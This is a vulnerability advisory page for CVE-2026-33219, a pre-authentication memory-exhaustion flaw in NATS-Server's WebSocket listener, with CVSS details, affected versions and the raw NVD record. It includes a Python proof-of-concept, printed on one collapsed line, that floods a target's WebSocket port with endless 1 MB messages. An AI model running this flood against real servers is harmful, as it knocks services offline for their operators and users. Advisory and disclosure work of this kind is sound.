Security Vulnerability Report
中文
CVE-2026-33219 CVSS 5.3 MEDIUM

CVE-2026-33219

Published: 2026-03-25 20:16:33
Last Modified: 2026-03-26 17:15:18
Source: [email protected]

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data. This is a milder variant of CVE-2026-27571. That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable websockets if not required for project deployment.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE
NATS-Server < 2.11.15
NATS-Server >= 2.12.0, < 2.12.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio import websockets async def exploit_memory_exhaustion(uri): """ PoC for CVE-2026-33219 Connects to NATS WebSocket port and sends large amounts of data to trigger unbounded memory use before authentication. """ try: # Connect to the target WebSocket port (default 8080 or 4222 depending on config) async with websockets.connect(uri) as websocket: print(f"[+] Connected to {uri}") # Create a large payload to consume memory # Note: Actual exploitation requires sustained data transmission payload = "A" * 1024 * 1024 # 1MB chunk counter = 0 while True: try: await websocket.send(payload) counter += 1 if counter % 10 == 0: print(f"[+] Sent {counter} MB of data...") except Exception as e: print(f"[-] Connection error or server crashed: {e}") break except Exception as e: print(f"[-] Failed to connect: {e}") # Target URI needs to be the WebSocket monitor/listener port # Example: asyncio.run(exploit_memory_exhaustion("ws://192.168.1.100:8080"))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33219", "sourceIdentifier": "[email protected]", "published": "2026-03-25T20:16:32.777", "lastModified": "2026-03-26T17:15:18.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data. This is a milder variant of CVE-2026-27571. That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable websockets if not required for project deployment."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, un cliente malicioso que puede conectarse al puerto de WebSockets puede causar un uso de memoria ilimitado en el nats-server antes de la autenticación; esto requiere el envío de una cantidad de datos correspondiente. Esta es una variante más leve de CVE-2026-27571. Ese problema anterior era una bomba de compresión, esta vulnerabilidad no lo es. Los ataques contra este nuevo problema, por lo tanto, requieren un ancho de banda significativo del cliente. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, deshabilite los websockets si no son necesarios para la implementación del proyecto."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-02.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://advisories.nats.io/CVE/secnote-2026-11.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/advisories/GHSA-qrvq-68c2-7grw", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-8r68-gvr4-jh7j", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.